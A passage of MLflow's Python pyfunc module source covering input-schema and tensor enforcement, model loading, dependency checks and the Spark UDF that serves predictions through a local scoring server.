Values must be YAML-serializable.
:return: Updated model configuration.
"""
params = deepcopy(kwargs)
params[MAIN] = loader_module
params[PY_VERSION] = PYTHON_VERSION
if code:
params[CODE] = code
if data:
params[DATA] = data
if env:
params[ENV] = env
return model.add_flavor(FLAVOR_NAME, **params)
def _load_model_env(path):
"""
Get ENV file string from a model configuration stored in Python Function format.
Returned value is a model-relative path to a Conda Environment file,
or None if none was specified at model save time
"""
return _get_flavor_configuration(model_path=path, flavor_name=FLAVOR_NAME).get(ENV, None)
def _enforce_mlflow_datatype(name, values: pandas.Series, t: DataType):
"""
Enforce the input column type matches the declared in model input schema.
The following type conversions are allowed:
1. object -> string
2. int -> long (upcast)
3. float -> double (upcast)
4. int -> double (safe conversion)
5. np.datetime64[x] -> datetime (any precision)
6. object -> datetime
Any other type mismatch will raise error.
"""
if values.dtype == object and t not in (DataType.binary, DataType.string):
values = values.infer_objects()
if t == DataType.string and values.dtype == object:
# NB: the object can contain any type and we currently cannot cast to pandas Strings
# due to how None is cast
return values
# NB: Comparison of pandas and numpy data type fails when numpy data type is on the left hand
# side of the comparison operator. It works, however, if pandas type is on the left hand side.
# That is because pandas is aware of numpy.
if t.to_pandas() == values.dtype or t.to_numpy() == values.dtype:
# The types are already compatible => conversion is not necessary.
return values
if t == DataType.binary and values.dtype.kind == t.binary.to_numpy().kind:
# NB: bytes in numpy have variable itemsize depending on the length of the longest
# element in the array (column). Since MLflow binary type is length agnostic, we ignore
# itemsize when matching binary columns.
return values
if t == DataType.datetime and values.dtype.kind == t.to_numpy().kind:
# NB: datetime values have variable precision denoted by brackets, e.g. datetime64[ns]
# denotes nanosecond precision. Since MLflow datetime type is precision agnostic, we
# ignore precision when matching datetime columns.
return values
if t == DataType.datetime and values.dtype == object:
# NB: Pyspark date columns get converted to object when converted to a pandas
# DataFrame. To respect the original typing, we convert the column to datetime.
try:
return values.astype(np.datetime64, errors="raise")
except ValueError:
raise MlflowException(
"Failed to convert column {0} from type {1} to {2}.".format(name, values.dtype, t)
)
numpy_type = t.to_numpy()
if values.dtype.kind == numpy_type.kind:
is_upcast = values.dtype.itemsize <= numpy_type.itemsize
elif values.dtype.kind == "u" and numpy_type.kind == "i":
is_upcast = values.dtype.itemsize < numpy_type.itemsize
elif values.dtype.kind in ("i", "u") and numpy_type == np.float64:
# allow (u)int => double conversion
is_upcast = values.dtype.itemsize <= 6
else:
is_upcast = False
if is_upcast:
return values.astype(numpy_type, errors="raise")
else:
# NB: conversion between incompatible types (e.g. floats -> ints or
# double -> float) are not allowed. While supported by pandas and numpy,
# these conversions alter the values significantly.
def all_ints(xs):
return all(pandas.isnull(x) or int(x) == x for x in xs)
hint = ""
if (
values.dtype == np.float64
and numpy_type.kind in ("i", "u")
and values.hasnans
and all_ints(values)
):
hint = (
" Hint: the type mismatch is likely caused by missing values. "
"Integer columns in python can not represent missing values and are therefore "
"encoded as floats. The best way to avoid this problem is to infer the model "
"schema based on a realistic data sample (training dataset) that includes missing "
"values. Alternatively, you can declare integer columns as doubles (float64) "
"whenever these columns may have missing values. See `Handling Integers With "
"Missing Values <https://www.mlflow.org/docs/latest/models.html#"
"handling-integers-with-missing-values>`_ for more details."
)
raise MlflowException(
"Incompatible input types for column {0}. "
"Can not safely convert {1} to {2}.{3}".format(name, values.dtype, numpy_type, hint)
)
def _enforce_tensor_spec(
values: Union[np.ndarray, csc_matrix, csr_matrix], tensor_spec: TensorSpec
):
"""
Enforce the input tensor shape and type matches the provided tensor spec.
"""
expected_shape = tensor_spec.shape
actual_shape = values.shape
actual_type = values.dtype if isinstance(values, np.ndarray) else values.data.dtype
if len(expected_shape) != len(actual_shape):
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
for expected, actual in zip(expected_shape, actual_shape):
if expected == -1:
continue
if expected != actual:
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
if clean_tensor_type(actual_type) != tensor_spec.type:
raise MlflowException(
"dtype of input {0} does not match expected dtype {1}".format(
values.dtype, tensor_spec.type
)
)
return values
def _enforce_col_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input columns conform to the model's column-based signature."""
if input_schema.has_input_names():
input_names = input_schema.input_names()
else:
input_names = pfInput.columns[: len(input_schema.inputs)]
input_types = input_schema.input_types()
new_pfInput = pandas.DataFrame()
for i, x in enumerate(input_names):
new_pfInput[x] = _enforce_mlflow_datatype(x, pfInput[x], input_types[i])
return new_pfInput
def _enforce_tensor_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input tensor(s) conforms to the model's tensor-based signature."""
if input_schema.has_input_names():
if isinstance(pfInput, dict):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
if not isinstance(pfInput[col_name], np.ndarray):
raise MlflowException(
"This model contains a tensor-based model signature with input names,"
" which suggests a dictionary input mapping input name to a numpy"
" array, but a dict with value type {0} was found.".format(
type(pfInput[col_name])
)
)
new_pfInput[col_name] = _enforce_tensor_spec(pfInput[col_name], tensor_spec)
elif isinstance(pfInput, pandas.DataFrame):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
new_pfInput[col_name] = _enforce_tensor_spec(
np.array(pfInput[col_name], dtype=tensor_spec.type), tensor_spec
)
else:
raise MlflowException(
"This model contains a tensor-based model signature with input names, which"
" suggests a dictionary input mapping input name to tensor, but an input of"
" type {0} was found.".format(type(pfInput))
)
else:
if isinstance(pfInput, pandas.DataFrame):
new_pfInput = _enforce_tensor_spec(pfInput.to_numpy(), input_schema.inputs[0])
elif isinstance(pfInput, (np.ndarray, csc_matrix, csr_matrix)):
new_pfInput = _enforce_tensor_spec(pfInput, input_schema.inputs[0])
else:
raise MlflowException(
"This model contains a tensor-based model signature with no input names,"
" which suggests a numpy array input, but an input of type {0} was"
" found.".format(type(pfInput))
)
return new_pfInput
def _enforce_schema(pfInput: PyFuncInput, input_schema: Schema):
"""
Enforces the provided input matches the model's input schema,
For signatures with input names, we check there are no missing inputs and reorder the inputs to
match the ordering declared in schema if necessary. Any extra columns are ignored.
For column-based signatures, we make sure the types of the input match the type specified in
the schema or if it can be safely converted to match the input schema.
For tensor-based signatures, we make sure the shape and type of the input matches the shape
and type specified in model's input schema.
"""
if not input_schema.is_tensor_spec():
if isinstance(pfInput, (list, np.ndarray, dict)):
try:
pfInput = pandas.DataFrame(pfInput)
except Exception as e:
raise MlflowException(
"This model contains a column-based signature, which suggests a DataFrame"
" input. There was an error casting the input data to a DataFrame:"
" {0}".format(str(e))
)
if not isinstance(pfInput, pandas.DataFrame):
raise MlflowException(
"Expected input to be DataFrame or list. Found: %s" % type(pfInput).__name__
)
if input_schema.has_input_names():
# make sure there are no missing columns
input_names = input_schema.input_names()
expected_cols = set(input_names)
actual_cols = set()
if len(expected_cols) == 1 and isinstance(pfInput, np.ndarray):
# for schemas with a single column, match input with column
pfInput = {input_names[0]: pfInput}
actual_cols = expected_cols
elif isinstance(pfInput, pandas.DataFrame):
actual_cols = set(pfInput.columns)
elif isinstance(pfInput, dict):
actual_cols = set(pfInput.keys())
missing_cols = expected_cols - actual_cols
extra_cols = actual_cols - expected_cols
# Preserve order from the original columns, since missing/extra columns are likely to
# be in same order.
missing_cols = [c for c in input_names if c in missing_cols]
extra_cols = [c for c in actual_cols if c in extra_cols]
if missing_cols:
raise MlflowException(
"Model is missing inputs {0}."
" Note that there were extra inputs: {1}".format(missing_cols, extra_cols)
)
elif not input_schema.is_tensor_spec():
# The model signature does not specify column names => we can only verify column count.
num_actual_columns = len(pfInput.columns)
if num_actual_columns < len(input_schema.inputs):
raise MlflowException(
"Model inference is missing inputs. The model signature declares "
"{0} inputs but the provided value only has "
"{1} inputs. Note: the inputs were not named in the signature so we can "
"only verify their count.".format(len(input_schema.inputs), num_actual_columns)
)
return (
_enforce_tensor_schema(pfInput, input_schema)
if input_schema.is_tensor_spec()
else _enforce_col_schema(pfInput, input_schema)
)
class PyFuncModel:
"""
MLflow 'python function' model.
Wrapper around model implementation and metadata. This class is not meant to be constructed
directly. Instead, instances of this class are constructed and returned from
:py:func:`load_model() <mlflow.pyfunc.load_model>`.
``model_impl`` can be any Python object that implements the `Pyfunc interface
<https://mlflow.org/docs/latest/python_api/mlflow.pyfunc.html#pyfunc-inference-api>`_, and is
returned by invoking the model's ``loader_module``.
``model_meta`` contains model metadata loaded from the MLmodel file.
"""
def __init__(self, model_meta: Model, model_impl: Any):
if not hasattr(model_impl, "predict"):
raise MlflowException("Model implementation is missing required predict method.")
if not model_meta:
raise MlflowException("Model is missing metadata.")
self._model_meta = model_meta
self._model_impl = model_impl
def predict(self, data: PyFuncInput) -> PyFuncOutput:
"""
Generate model predictions.
If the model contains signature, enforce the input schema first before calling the model
implementation with the sanitized input. If the pyfunc model does not include model schema,
the input is passed to the model implementation as is. See `Model Signature Enforcement
<https://www.mlflow.org/docs/latest/models.html#signature-enforcement>`_ for more details."
:param data: Model input as one of pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], or
Dict[str, numpy.ndarray]
:return: Model predictions as one of pandas.DataFrame, pandas.Series, numpy.ndarray or list.
"""
input_schema = self.metadata.get_input_schema()
if input_schema is not None:
data = _enforce_schema(data, input_schema)
return self._model_impl.predict(data)
@property
def metadata(self):
"""Model metadata."""
if self._model_meta is None:
raise MlflowException("Model is missing metadata.")
return self._model_meta
def __repr__(self):
info = {}
if self._model_meta is not None:
if hasattr(self._model_meta, "run_id") and self._model_meta.run_id is not None:
info["run_id"] = self._model_meta.run_id
if (
hasattr(self._model_meta, "artifact_path")
and self._model_meta.artifact_path is not None
):
info["artifact_path"] = self._model_meta.artifact_path
info["flavor"] = self._model_meta.flavors[FLAVOR_NAME]["loader_module"]
return yaml.safe_dump({"mlflow.pyfunc.loaded_model": info}, default_flow_style=False)
def _warn_dependency_requirement_mismatches(model_path):
"""
Inspects the model's dependencies and prints a warning if the current Python environment
doesn't satisfy them.
"""
req_file_path = os.path.join(model_path, _REQUIREMENTS_FILE_NAME)
if not os.path.exists(req_file_path):
return
try:
mismatch_infos = []
for req in _parse_requirements(req_file_path, is_constraint=False):
req_line = req.req_str
mismatch_info = _check_requirement_satisfied(req_line)
if mismatch_info is not None:
mismatch_infos.append(str(mismatch_info))
if len(mismatch_infos) > 0:
mismatch_str = " - " + "\n - ".join(mismatch_infos)
warning_msg = (
"Detected one or more mismatches between the model's dependencies and the current "
f"Python environment:\n{mismatch_str}\n"
"To fix the mismatches, call `mlflow.pyfunc.get_model_dependencies(model_uri)` "
"to fetch the model's environment and install dependencies using the resulting "
"environment file."
)
_logger.warning(warning_msg)
except Exception as e:
_logger.warning(
f"Encountered an unexpected error ({repr(e)}) while detecting model dependency "
"mismatches. Set logging level to DEBUG to see the full traceback."
)
_logger.debug("", exc_info=True)
def load_model(
model_uri: str, suppress_warnings: bool = False, dst_path: str = None
) -> PyFuncModel:
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
:param dst_path: The local filesystem path to which to download the model artifact.
This directory must already exist. If unspecified, a local output
path will be created.
"""
local_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
if not suppress_warnings:
_warn_dependency_requirement_mismatches(local_path)
model_meta = Model.load(os.path.join(local_path, MLMODEL_FILE_NAME))
conf = model_meta.flavors.get(FLAVOR_NAME)
if conf is None:
raise MlflowException(
'Model does not have the "{flavor_name}" flavor'.format(flavor_name=FLAVOR_NAME),
RESOURCE_DOES_NOT_EXIST,
)
model_py_version = conf.get(PY_VERSION)
if not suppress_warnings:
_warn_potentially_incompatible_py_version_if_necessary(model_py_version=model_py_version)
_add_code_from_conf_to_system_path(local_path, conf, code_key=CODE)
data_path = os.path.join(local_path, conf[DATA]) if (DATA in conf) else local_path
model_impl = importlib.import_module(conf[MAIN])._load_pyfunc(data_path)
return PyFuncModel(model_meta=model_meta, model_impl=model_impl)
def _download_model_conda_env(model_uri):
conda_yml_file_name = _get_flavor_configuration_from_uri(model_uri, FLAVOR_NAME)[ENV]
return _download_artifact_from_uri(append_to_uri_path(model_uri, conda_yml_file_name))
def _get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
if format == "pip":
req_file_uri = append_to_uri_path(model_uri, _REQUIREMENTS_FILE_NAME)
try:
return _download_artifact_from_uri(req_file_uri)
except Exception as e:
# fallback to download conda.yaml file and parse the "pip" section from it.
_logger.info(
f"Downloading model '{_REQUIREMENTS_FILE_NAME}' file failed, error is {repr(e)}. "
"Falling back to fetching pip requirements from the model's 'conda.yaml' file. "
"Other conda dependencies will be ignored."
)
conda_yml_path = _download_model_conda_env(model_uri)
with open(conda_yml_path, "r") as yf:
conda_yml = yaml.safe_load(yf)
conda_deps = conda_yml.get("dependencies", [])
for index, dep in enumerate(conda_deps):
if isinstance(dep, dict) and "pip" in dep:
pip_deps_index = index
break
else:
raise MlflowException(
"No pip section found in conda.yaml file in the model directory.",
error_code=RESOURCE_DOES_NOT_EXIST,
)
pip_deps = conda_deps.pop(pip_deps_index)["pip"]
tmp_dir = tempfile.mkdtemp()
pip_file_path = os.path.join(tmp_dir, _REQUIREMENTS_FILE_NAME)
with open(pip_file_path, "w") as f:
f.write("\n".join(pip_deps) + "\n")
if len(conda_deps) > 0:
_logger.warning(
"The following conda dependencies have been excluded from the environment file:"
f" {', '.join(conda_deps)}."
)
return pip_file_path
elif format == "conda":
conda_yml_path = _download_model_conda_env(model_uri)
return conda_yml_path
else:
raise MlflowException(
f"Illegal format argument '{format}'.", error_code=INVALID_PARAMETER_VALUE
)
def get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
"""
:param model_uri: The uri of the model to get dependencies from.
:param format: The format of the returned dependency file. If the ``"pip"`` format is
specified, the path to a pip ``requirements.txt`` file is returned.
If the ``"conda"`` format is specified, the path to a ``"conda.yaml"``
file is returned . If the ``"pip"`` format is specified but the model
was not saved with a ``requirements.txt`` file, the ``pip`` section
of the model's ``conda.yaml`` file is extracted instead, and any
additional conda dependencies are ignored. Default value is ``"pip"``.
:return: The local filesystem path to either a pip ``requirements.txt`` file
(if ``format="pip"``) or a ``conda.yaml`` file (if ``format="conda"``)
specifying the model's dependencies.
"""
dep_file = _get_model_dependencies(model_uri, format)
if format == "pip":
prefix = "%" if is_in_databricks_runtime() else ""
_logger.info(
"To install these model dependencies, run the "
f"following command: '{prefix}pip install -r {dep_file}'."
)
return dep_file
@deprecated("mlflow.pyfunc.load_model", 1.0)
def load_pyfunc(model_uri, suppress_warnings=False):
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
"""
return load_model(model_uri, suppress_warnings)
def _warn_potentially_incompatible_py_version_if_necessary(model_py_version=None):
"""
Compares the version of Python that was used to save a given model with the version
of Python that is currently running. If a major or minor version difference is detected,
logs an appropriate warning.
"""
if model_py_version is None:
_logger.warning(
"The specified model does not have a specified Python version. It may be"
" incompatible with the version of Python that is currently running: Python %s",
PYTHON_VERSION,
)
elif get_major_minor_py_version(model_py_version) != get_major_minor_py_version(PYTHON_VERSION):
_logger.warning(
"The version of Python that the model was saved in, `Python %s`, differs"
" from the version of Python that is currently running, `Python %s`,"
" and may be incompatible",
model_py_version,
PYTHON_VERSION,
)
def _create_model_downloading_tmp_dir(should_use_nfs):
if should_use_nfs:
root_tmp_dir = get_or_create_nfs_tmp_dir()
else:
root_tmp_dir = get_or_create_tmp_dir()
root_model_cache_dir = os.path.join(root_tmp_dir, "models")
os.makedirs(root_model_cache_dir, exist_ok=True)
tmp_model_dir = tempfile.mkdtemp(dir=root_model_cache_dir)
# mkdtemp creates a directory with permission 0o700
# change it to be 0o777 to ensure it can be seen in spark UDF
os.chmod(tmp_model_dir, 0o777)
return tmp_model_dir
@cache_return_value_per_process
def _get_or_create_env_root_dir(should_use_nfs):
if should_use_nfs:
root_tmp_dir = get_or_create_nfs_tmp_dir()
else:
root_tmp_dir = get_or_create_tmp_dir()
env_root_dir = os.path.join(root_tmp_dir, "envs")
os.makedirs(env_root_dir, exist_ok=True)
return env_root_dir
_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP = 200
def spark_udf(spark, model_uri, result_type="double", env_manager="local"):
"""
A Spark UDF that can be used to invoke the Python function formatted model.
Parameters passed to the UDF are forwarded to the model as a DataFrame where the column names
are ordinals (0, 1, ...). On some versions of Spark (3.0 and above), it is also possible to
wrap the input in a struct. In that case, the data will be passed as a DataFrame with column
names given by the struct definition (e.g. when invoked as my_udf(struct('x', 'y')), the model
will get the data as a pandas DataFrame with 2 columns 'x' and 'y').
If a model contains a signature, the UDF can be called without specifying column name
arguments. In this case, the UDF will be called with column names from signature, so the
evaluation dataframe's column names must match the model signature's column names.
The predictions are filtered to contain only the columns that can be represented as the
``result_type``. If the ``result_type`` is string or array of strings, all predictions are
converted to string. If the result type is not an array type, the left most column with
matching type is returned.
NOTE: Inputs of type ``pyspark.sql.types.DateType`` are not supported on earlier versions of
Spark (2.4 and below).
.. code-block:: python
:caption: Example
from pyspark.sql.functions import struct
predict = mlflow.pyfunc.spark_udf(spark, "/my/local/model")
df.withColumn("prediction", predict(struct("name", "age"))).show()
:param spark: A SparkSession object.
:param model_uri: The location, in URI format, of the MLflow model with the
:py:mod:`mlflow.pyfunc` flavor. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param result_type: the return type of the user-defined function. The value can be either a
``pyspark.sql.types.DataType`` object or a DDL-formatted type string. Only a primitive
type or an array ``pyspark.sql.types.ArrayType`` of primitive type are allowed.
The following classes of result type are supported:
- "int" or ``pyspark.sql.types.IntegerType``: The leftmost integer that can fit in an
``int32`` or an exception if there is none.
- "long" or ``pyspark.sql.types.LongType``: The leftmost long integer that can fit in an
``int64`` or an exception if there is none.
- ``ArrayType(IntegerType|LongType)``: All integer columns that can fit into the requested
size.
- "float" or ``pyspark.sql.types.FloatType``: The leftmost numeric result cast to
``float32`` or an exception if there is none.
- "double" or ``pyspark.sql.types.DoubleType``: The leftmost numeric result cast to
``double`` or an exception if there is none.
- ``ArrayType(FloatType|DoubleType)``: All numeric columns cast to the requested type or
an exception if there are no numeric columns.
- "string" or ``pyspark.sql.types.StringType``: The leftmost column converted to ``string``.
- ``ArrayType(StringType)``: All columns converted to ``string``.
:param env_manager: The environment manager to use in order to create the
software environment for model inference. Default value is ``local``,
The following values are supported:
- ``conda``: (Recommended) Use Conda to restore the software environment
that was used to train the model. Note that environment is only restored
in the context of the PySpark UDF; the software environment outside of
the UDF is unaffected.
- ``local``: Use the current Python environment for model inference, which
may differ from the environment used to train the model and may lead to
errors or invalid predictions.
:return: Spark UDF that applies the model's ``predict`` method to the data and returns a
type specified by ``result_type``, which by default is a double.
"""
# Scope Spark import to this method so users don't need pyspark to use non-Spark-related
# functionality.
import functools
from mlflow.pyfunc.spark_model_cache import SparkModelCache
from mlflow.utils._spark_utils import _SparkDirectoryDistributor
from pyspark.sql.functions import pandas_udf
from pyspark.sql.types import _parse_datatype_string
from pyspark.sql.types import (
ArrayType,
DataType as SparkDataType,
StructType as SparkStructType,
)
from pyspark.sql.types import DoubleType, IntegerType, FloatType, LongType, StringType
from mlflow.models.cli import _get_flavor_backend
env_manager = _EnvManager.from_string(env_manager)
# Check whether spark is in local or local-cluster mode
# this case all executors and driver share the same filesystem
is_spark_in_local_mode = spark.conf.get("spark.master").startswith("local")
nfs_root_dir = get_nfs_cache_root_dir()
should_use_nfs = nfs_root_dir is not None
should_use_spark_to_broadcast_file = not (is_spark_in_local_mode or should_use_nfs)
conda_env_root_dir = _get_or_create_env_root_dir(should_use_nfs)
if not isinstance(result_type, SparkDataType):
result_type = _parse_datatype_string(result_type)
elem_type = result_type
if isinstance(elem_type, ArrayType):
elem_type = elem_type.elementType
supported_types = [IntegerType, LongType, FloatType, DoubleType, StringType]
if not any(isinstance(elem_type, x) for x in supported_types):
raise MlflowException(
message="Invalid result_type '{}'. Result type can only be one of or an array of one "
"of the following types: {}".format(str(elem_type), str(supported_types)),
error_code=INVALID_PARAMETER_VALUE,
)
local_model_path = _download_artifact_from_uri(
artifact_uri=model_uri, output_path=_create_model_downloading_tmp_dir(should_use_nfs)
)
if env_manager is _EnvManager.LOCAL:
# Assume spark executor python environment is the same with spark driver side.
_warn_dependency_requirement_mismatches(local_model_path)
_logger.warning(
'Calling `spark_udf()` with `env_manager="local"` does not recreate the same '
"environment that was used during training, which may lead to errors or inaccurate "
'predictions. We recommend specifying `env_manager="conda"`, which automatically '
"recreates the environment that was used to train the model and performs inference "
"in the recreated environment."
)
else:
_logger.info(
"This UDF will use Conda to recreate the model's software environment for inference. "
"This may take extra time during execution."
)
if not sys.platform.startswith("linux"):
# TODO: support killing mlflow server launched in UDF task when spark job canceled
# for non-linux system.
# https://stackoverflow.com/questions/53208/how-do-i-automatically-destroy-child-processes-in-windows
_logger.warning(
"In order to run inference code in restored python environment, PySpark UDF "
"processes spawn MLflow Model servers as child processes. Due to system "
"limitations with handling SIGKILL signals, these MLflow Model server child "
"processes cannot be cleaned up if the Spark Job is canceled."
)
if not should_use_spark_to_broadcast_file:
# Prepare restored environment in driver side if possible.
# Note: In databricks runtime, because databricks notebook cell output cannot capture
# child process output, so that set capture_output to be True so that when `conda prepare
# env` command failed, the exception message will include command stdout/stderr output.
# Otherwise user have to check cluster driver log to find command stdout/stderr output.
# In non-databricks runtime, set capture_output to be False, because the benefit of
# "capture_output=False" is the output will be printed immediately, otherwise you have
# to wait conda command fail and suddenly get all output printed (included in error
# message).
if env_manager is _EnvManager.CONDA:
_get_flavor_backend(
local_model_path,
env_manager=_EnvManager.CONDA,
install_mlflow=False,
env_root_dir=conda_env_root_dir,
).prepare_env(model_uri=local_model_path, capture_output=is_in_databricks_runtime())
# Broadcast local model directory to remote worker if needed.
if should_use_spark_to_broadcast_file:
archive_path = SparkModelCache.add_local_model(spark, local_model_path)
model_metadata = Model.load(os.path.join(local_model_path, MLMODEL_FILE_NAME))
def _predict_row_batch(predict_fn, args):
input_schema = model_metadata.get_input_schema()
pdf = None
for x in args:
if type(x) == pandas.DataFrame:
if len(args) != 1:
raise Exception(
"If passing a StructType column, there should be only one "
"input column, but got %d" % len(args)
)
pdf = x
if pdf is None:
args = list(args)
if input_schema is None:
names = [str(i) for i in range(len(args))]
else:
names = input_schema.input_names()
if len(args) > len(names):
args = args[: len(names)]
if len(args) < len(names):
raise MlflowException(
"Model input is missing columns. Expected {0} input columns {1},"
" but the model received only {2} unnamed input columns"
" (Since the columns were passed unnamed they are expected to be in"
" the order specified by the schema).".format(len(names), names, len(args))
)
pdf = pandas.DataFrame(data={names[i]: x for i, x in enumerate(args)}, columns=names)
result = predict_fn(pdf)
if not isinstance(result, pandas.DataFrame):
result = pandas.DataFrame(data=result)
elem_type = result_type.elementType if isinstance(result_type, ArrayType) else result_type
if type(elem_type) == IntegerType:
result = result.select_dtypes(
[np.byte, np.ubyte, np.short, np.ushort, np.int32]
).astype(np.int32)
elif type(elem_type) == LongType:
result = result.select_dtypes([np.byte, np.ubyte, np.short, np.ushort, int])
elif type(elem_type) == FloatType:
result = result.select_dtypes(include=(np.number,)).astype(np.float32)
elif type(elem_type) == DoubleType:
result = result.select_dtypes(include=(np.number,)).astype(np.float64)
if len(result.columns) == 0:
raise MlflowException(
message="The the model did not produce any values compatible with the requested "
"type '{}'. Consider requesting udf with StringType or "
"Arraytype(StringType).".format(str(elem_type)),
error_code=INVALID_PARAMETER_VALUE,
)
if type(elem_type) == StringType:
result = result.applymap(str)
if type(result_type) == ArrayType:
return pandas.Series(result.to_numpy().tolist())
else:
return result[result.columns[0]]
result_type_hint = (
pandas.DataFrame if isinstance(result_type, SparkStructType) else pandas.Series
)
@pandas_udf(result_type)
def udf(
iterator: Iterator[Tuple[Union[pandas.Series, pandas.DataFrame], ...]]
) -> Iterator[result_type_hint]:
# importing here to prevent circular import
from mlflow.pyfunc.scoring_server.client import ScoringServerClient
# Note: this is a pandas udf function in iteration style, which takes an iterator of
# tuple of pandas.Series and outputs an iterator of pandas.Series.
scoring_server_proc = None
# TODO: Support virtual env.
if env_manager is _EnvManager.CONDA:
if should_use_spark_to_broadcast_file:
local_model_path_on_executor = _SparkDirectoryDistributor.get_or_extract(
archive_path
)
# Create individual conda_env_root_dir for each spark UDF task process.
conda_env_root_dir_on_executor = _get_or_create_env_root_dir(should_use_nfs)
else:
local_model_path_on_executor = local_model_path
conda_env_root_dir_on_executor = conda_env_root_dir
pyfunc_backend = _get_flavor_backend(
local_model_path_on_executor,
workers=1,
install_mlflow=False,
env_manager=_EnvManager.CONDA,
env_root_dir=conda_env_root_dir_on_executor,
)
if should_use_spark_to_broadcast_file:
# Call "prepare_env" in advance in order to reduce scoring server launch time.
# So that we can use a shorter timeout when call `client.wait_server_ready`,
# otherwise we have to set a long timeout for `client.wait_server_ready` time,
# this prevents spark UDF task failing fast if other exception raised when scoring
# server launching.
# Set "capture_output" so that if "conda env create" command failed, the command
# stdout/stderr output will be attached to the exception message and included in
# driver side exception.
pyfunc_backend.prepare_env(
model_uri=local_model_path_on_executor, capture_output=True
)
# launch scoring server
# TODO: adjust timeout for server requests handler.
server_port = find_free_port()
scoring_server_proc = pyfunc_backend.serve(
model_uri=local_model_path_on_executor,
port=server_port,
host="127.0.0.1",
enable_mlserver=False,
synchronous=False,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
server_tail_logs = collections.deque(maxlen=_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP)
def server_redirect_log_thread_func(child_stdout):
for line in child_stdout:
if isinstance(line, bytes):
decoded = line.decode()
else:
decoded = line
server_tail_logs.append(decoded)
sys.stdout.write("[model server] " + decoded)
server_redirect_log_thread = threading.Thread(
target=server_redirect_log_thread_func, args=(scoring_server_proc.stdout,)
)
server_redirect_log_thread.setDaemon(True)
server_redirect_log_thread.start()
client = ScoringServerClient("127.0.0.1", server_port)
try:
client.wait_server_ready(timeout=90, scoring_server_proc=scoring_server_proc)
except Exception:
err_msg = "During spark UDF task execution, mlflow model server failed to launch. "
if len(server_tail_logs) == _MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP:
err_msg += (
f"Last {_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP} "
"lines of MLflow model server output:\n"
)
else:
err_msg += "MLflow model server output:\n"
err_msg += "".join(server_tail_logs)
raise MlflowException(err_msg)
def batch_predict_fn(pdf):
return client.invoke(pdf)
elif env_manager is _EnvManager.LOCAL:
if should_use_spark_to_broadcast_file:
loaded_model, _ = SparkModelCache.get_or_load(archive_path)
else:
loaded_model = mlflow.pyfunc.load_model(local_model_path)
def batch_predict_fn(pdf):
return loaded_model.predict(pdf)
try:
for input_batch in iterator:
# If the UDF is called with only multiple arguments,
# the `input_batch` is a tuple which composes of several pd.Series/pd.DataFrame
# objects.
# If the UDF is called with only one argument,
# the `input_batch` instance will be an instance of `pd.Series`/`pd.DataFrame`,
if isinstance(input_batch, (pandas.Series, pandas.DataFrame)):
# UDF is called with only one argument
row_batch_args = (input_batch,)
else:
row_batch_args = input_batch
yield _predict_row_batch(batch_predict_fn, row_batch_args)
finally:
if scoring_server_proc is not None:
os.kill(scoring_server_proc.pid, signal.SIGTERM)
udf.metadata = model_metadata
@functools.wraps(udf)
def udf_with_default_cols(*args):
if len(args) == 0:
input_schema = model_metadata.get_input_schema()
if input_schema and len(input_schema.inputs) > 0:
if input_schema.has_input_names():
input_names = input_schema.input_names()
return udf(*input_names)
else:
raise MlflowException(
message="Cannot apply udf because no column names specified. The udf "
"expects {} columns with types: {}. Input column names could not be "
"inferred from the model signature (column names not found).".format(
len(input_schema.inputs),
input_schema.inputs,
),
error_code=INVALID_PARAMETER_VALUE,
)
else:
raise MlflowException(
"Attempting to apply udf on zero columns because no column names were "
"specified as arguments or inferred from the model signature.",
error_code=INVALID_PARAMETER_VALUE,
)
else:
return udf(*args)
return udf_with_default_cols
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def save_model(
path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
mlflow_model=None,
python_model=None,
artifacts=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
pip_requirements=None,
extra_pip_requirements=None,
